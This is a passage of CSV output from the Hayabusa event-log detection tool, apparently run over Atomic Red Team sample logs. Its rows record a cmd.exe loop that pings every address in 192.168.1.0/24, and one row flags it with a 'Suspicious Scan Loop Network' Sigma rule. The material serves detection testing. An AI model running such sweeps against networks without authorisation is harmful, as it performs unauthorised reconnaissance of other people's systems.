747F3D96-D8F6-5D31-0000-00100FCB3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:35.014 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %%i in (1,1,254) do ping -n 1 -w 100 192.168.1.%%i"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4528 | PGUID: 747F3D96-D8F6-5D31-0000-001091D13300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:35.014 +00:00,MSEDGEWIN10,1,medium,Exec | Disc,Suspicious Scan Loop Network,,rules/sigma/process_creation_sysmon/proc_creation_win_network_scan_loop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:35.038 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.1 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3876 | PGUID: 747F3D96-D8F7-5D31-0000-0010EDD33300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:35.579 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.2 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2084 | PGUID: 747F3D96-D8F7-5D31-0000-0010E3D83300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:35.988 
+00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.3 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3068 | PGUID: 747F3D96-D8F7-5D31-0000-0010A7E13300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:36.549 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.4 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4376 | PGUID: 747F3D96-D8F8-5D31-0000-00108FE43300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:37.034 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.5 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3116 | PGUID: 747F3D96-D8F9-5D31-0000-00108BE73300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:37.513 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.6 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3868 | PGUID: 
747F3D96-D8F9-5D31-0000-001073EA3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:38.020 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.7 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1020 | PGUID: 747F3D96-D8FA-5D31-0000-00105BED3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:38.517 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.8 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2292 | PGUID: 747F3D96-D8FA-5D31-0000-001043F03300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:39.028 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.9 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3612 | PGUID: 747F3D96-D8FB-5D31-0000-00108BF33300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:39.537 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.10 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 
0x50951 | PID: 5852 | PGUID: 747F3D96-D8FB-5D31-0000-001073F63300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:40.027 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.11 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2412 | PGUID: 747F3D96-D8FC-5D31-0000-001070F93300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:40.431 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.12 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D8FC-5D31-0000-00105AFC3300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:41.066 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.13 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D8FD-5D31-0000-0010650E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:41.408 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.14 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping 
-n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 752 | PGUID: 747F3D96-D8FD-5D31-0000-00104F113400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:41.894 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.15 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4588 | PGUID: 747F3D96-D8FD-5D31-0000-001039143400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:42.466 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.16 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1880 | PGUID: 747F3D96-D8FE-5D31-0000-001023173400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:43.036 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.17 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-D8FF-5D31-0000-00100E1A3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:43.503 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.18 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c 
""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4316 | PGUID: 747F3D96-D8FF-5D31-0000-0010C5203400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:44.030 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.19 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6084 | PGUID: 747F3D96-D900-5D31-0000-0010B0233400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:44.507 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.20 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2416 | PGUID: 747F3D96-D900-5D31-0000-00109C263400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:45.011 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.21 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4104 | PGUID: 747F3D96-D901-5D31-0000-001086293400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:45.501 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.22 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5112 | PGUID: 747F3D96-D901-5D31-0000-0010712C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:46.007 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.23 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1104 | PGUID: 747F3D96-D902-5D31-0000-00105B2F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:46.500 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.24 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4700 | PGUID: 747F3D96-D902-5D31-0000-0010B2393400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:47.022 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.25 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6104 | PGUID: 747F3D96-D903-5D31-0000-00109D3C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:47.546 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.26 | Process: C:\Windows\System32\PING.EXE | User: 
MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3216 | PGUID: 747F3D96-D903-5D31-0000-0010873F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:48.044 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.27 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1492 | PGUID: 747F3D96-D904-5D31-0000-001084423400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:48.507 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.28 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1316 | PGUID: 747F3D96-D904-5D31-0000-00106E453400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:49.010 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.29 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5640 | PGUID: 747F3D96-D905-5D31-0000-001058483400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:49.550 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.30 | Process: 
C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2928 | PGUID: 747F3D96-D905-5D31-0000-0010554B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:50.021 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.31 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1952 | PGUID: 747F3D96-D906-5D31-0000-00103F4E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:50.507 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.32 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3760 | PGUID: 747F3D96-D906-5D31-0000-001029513400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:51.013 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.33 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1992 | PGUID: 747F3D96-D907-5D31-0000-001013543400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:51.520 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 
1 -w 100 192.168.1.34 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4788 | PGUID: 747F3D96-D907-5D31-0000-0010DA5C3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:52.008 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.35 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3212 | PGUID: 747F3D96-D908-5D31-0000-0010C45F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:52.448 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.36 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2552 | PGUID: 747F3D96-D908-5D31-0000-0010B2623400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:53.019 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.37 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2932 | PGUID: 747F3D96-D909-5D31-0000-00109E653400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:53.546 
+00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.38 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6616 | PGUID: 747F3D96-D909-5D31-0000-001088683400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:54.036 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.39 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4312 | PGUID: 747F3D96-D90A-5D31-0000-0010726B3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:54.581 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.40 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3684 | PGUID: 747F3D96-D90A-5D31-0000-00105C6E3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:55.015 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.41 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 796 | PGUID: 
747F3D96-D90B-5D31-0000-001046713400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:55.552 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.42 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5000 | PGUID: 747F3D96-D90B-5D31-0000-001031743400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:56.049 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.43 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4660 | PGUID: 747F3D96-D90C-5D31-0000-00102E773400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:56.534 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.44 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1360 | PGUID: 747F3D96-D90C-5D31-0000-0010F37F3400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:51:57.034 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.45 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | 
